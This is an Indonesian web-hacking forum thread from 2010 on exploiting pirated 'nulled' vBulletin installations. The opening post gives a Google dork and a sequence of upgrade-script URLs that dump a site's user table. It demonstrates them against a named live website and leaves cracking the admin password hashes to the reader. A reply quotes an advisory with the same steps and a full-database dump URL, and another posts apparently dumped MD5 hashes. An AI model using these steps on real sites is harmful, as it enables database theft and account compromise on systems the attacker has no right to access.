[Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBulletin

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

[Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBulletin

Post by poni » Sun Jun 13, 2010 9:05 am

Vbulletin siapa yang ga kenal? Forum board yang sangat populer dan digunakan oleh forum2 besar di tanah air seperti kaskus, chip.co.id, bluefame(sekarang mereka sudah beralih ke ipboard) dan masih banyak lagi.

Pada vBulletin versi 3.6.x Nulled by NiGHTNiNG bisa dieksploitasi dengan beberapa baris script. Baiklah mari kita coba praktek langsung.

Google Dork :

Code: Select all

Powered by vBulletin || Nulled by NiGHTNiNG
sebagai contohnya kita coba di http://ex-ukm.com

Image
di browser masuk ke path install web tersebut :

Code: Select all

http://ex-ukm.com/install/upgrade_300.php?
Image
Untuk mengetahui table user database tersebut masuk ke

Code: Select all

http://ex-ukm.com/install/upgrade_300.php?step=1
kita bisa lihat table user bernama vbuser

Image
lalu lakukan langkah berikut

Code: Select all

http://ex-ukm.com/install/upgrade_300.php?step=2
Image
Setelah itu Dump tabel user pada databasenya

Code: Select all

http://ex-ukm.com/install/upgrade_301.php?step=backup&do=sqltable&table=vbuser
buka dengan notepad hasil dump tersebut. dan anda bisa menemukan user admin serta password yang dienkripsi (PR anda untuk memecahkan hash tersebut).

Don`t be Evil
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

RJ-45
Posts: 78
Joined: Thu Dec 17, 2009 2:29 pm

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Post by RJ-45 » Sun Jun 13, 2010 9:31 am

haduh...
Q ru newbie, mau nyoba malah bingung sendiri....!
:circle:
:mati:

RJ-45
Posts: 78
Joined: Thu Dec 17, 2009 2:29 pm

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Post by RJ-45 » Sun Jun 13, 2010 9:56 am


cyber_criminal
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Post by cyber_criminal » Sun Jun 13, 2010 10:11 am

keren om poni
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.

User avatar
Tool3
Posts: 99
Joined: Sun Feb 22, 2009 6:54 pm
Contact:

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Post by Tool3 » Sun Jun 13, 2010 11:49 am

:kaca:

keren nih mas poni good joh kang

User avatar
demonbrando
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Post by demonbrando » Sun Jun 13, 2010 3:20 pm

mantap dah abng poni.... :devil :devil
jalani hidup ini dengan santai tapi jangan lupa ibadah..

User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Post by shinichi81 » Sun Jun 13, 2010 10:01 pm

Bos poni,kalau pas proses ternyata ada 5 step,apakah ahrus dicek satu2 atau bisa dilewat? terus cara dump-nya apakah setelah kita lewati tahap step terakhir.terima kasih
............make a wish............

User avatar
Darkzzzz
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
Contact:

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Post by Darkzzzz » Mon Jun 14, 2010 6:13 pm

md5?lm?
Huufth... Susah ah bang pon >.<
d78e6f07891bd7c2739f78770d97508a
13c6516c95d3f27263b2056efbc66852
google.com wrote: Date: 06. October 2008
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-67.html

Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
vBulletin 3.x pirated ("nulled") versions can be found in use in many websites.
Example GoogleDork: "Nulled by NiGHTNiNG"

Vulnerabilities discovered
===============================================================================
vBulletin official installation guide states:
"You should delete the install.php and upgrade*.php files now as a security precaution."
Still, there are lot's of vBulletin-based websites with accessible update scripts.
Let's try this:

http://********.com/install/upgrade_300.php
"Please Enter Your Customer Number" --> no easy way in, seems safe :)
Now - what about "nulled" (pirated) vBulletin installations? It's amazingly huge
community of nulled vBulletin users on Internet. Nulling - it means, that licence
validation is crippled and usually customer number checking is completely removed!
So anyone can access upgrade scripts without any authentication! This is possible,
if upgrade files are not deleted and there is no additional access limiting methods
implemented (like ".htaccess").

Let's find some pirated vBulletin installation and try this same request:
http://********.com/install/upgrade_300.php
-----------------------------------------------------------------------------
Your vBulletin version does not appear to match with the version for which this
script was created (version 3.0.0 Release Candidate 4).

Please ensure that you are attempting to run the correct script.
If you are sure this is the script you would like to run, click here.
-----------------------------------------------------------------------------

Oops ... what now? Let's try this:
http://********.com/install/upgrade_300.php?step=1

-----------------------------------------------------------------------------
Step 1) Fix Some Table Errors (Step 1 of 2)
Database error in vBulletin 3.0.0:
Invalid SQL:
ALTER TABLE vb_user ADD birthday_search DATE NOT NULL DEFAULT '0000-00-00';
MySQL Error : Duplicate column name 'birthday_search'
-----------------------------------------------------------------------------
Cool, now we know table prexix! What next?

http://********.com/install/upgrade_300.php?step=2
-----------------------------------------------------------------------------
Step 2) Upgrade to vBulletin 3.0.0 Complete!
* Updating Version Number to 3.0.0... done
-----------------------------------------------------------------------------

And finally - how about users table dump? Try this:

http://********.com/install/upgrade_301.php?step=backup&do=sqltable&table=vb_user
Or maybe full database dump? Why not, here it is:
http://********.com/install/upgrade_301.php?step=backup&do=sqltable
-----------------------------------------------------------------------------
Opening vb_user.sql --> download prompt
-----------------------------------------------------------------------------
Mission complete! Pirates pwned :)

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Buy legal vBulletin licence. Or at least delete install directory.
Ternyata barang bajakan (BB) itu berbahaya yach gan :omg:
I'm not A Hacker, But I'm A Image

d1kz
Posts: 107
Joined: Fri Jul 24, 2009 3:50 pm
Location: B4t4v14
Contact:

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Post by d1kz » Mon Jun 14, 2010 9:12 pm

cara ngdump nya gmana kk, biar dpt lin ky gni http://ex-ukm.com/install/upgrade_301.p ... ble=vbuser ..???? :kaca: :kaca: :kaca:
::. Ikuti slalu kata hati .::

User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Post by shinichi81 » Tue Jun 15, 2010 2:17 pm

d1kz wrote:cara ngdump nya gmana kk, biar dpt lin ky gni http://ex-ukm.com/install/upgrade_301.p ... ble=vbuser ..???? :kaca: :kaca: :kaca:

kalau cara nge-dumpnya otomatis bos.....cuman sekarang ini banyak yang sudah di patch...
............make a wish............

Post Reply

Return to “Web Hacking”